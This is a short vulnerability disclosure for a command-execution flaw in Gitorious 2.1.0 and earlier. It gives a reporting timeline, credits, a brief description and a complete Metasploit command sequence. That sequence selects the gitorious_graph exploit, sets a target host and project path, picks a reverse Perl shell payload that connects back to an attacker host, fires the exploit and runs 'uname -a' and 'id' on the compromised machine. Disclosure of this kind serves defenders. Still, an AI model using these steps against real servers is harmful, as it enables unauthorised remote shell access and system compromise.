Timeline :
Vulnerability reported to the vendor by joernchen the 2012-01-17
Coordinated public release of the vulnerability the 2012-01-27
Metasploit PoC provided the 2012-01-19
PoC provided by :
joernchen
Reference(s) :
Affected version(s) :
Gitorious before or equal to version 2.1.0
Tested on Ubuntu 11.10 with :
Gitorious 2.1.0
Description :
This module exploits an arbitrary command execution vulnerability in the in gitorious. Unvalidated input is send to the shell allowing command execution.
Commands :
use exploit/multi/http/gitorious_graph set RHOST 192.168.178.115 set URI /myproject/myproject SET PAYLOAD cmd/unix/reverse_perl set LHOST 192.168.178.100 exploit uname -a id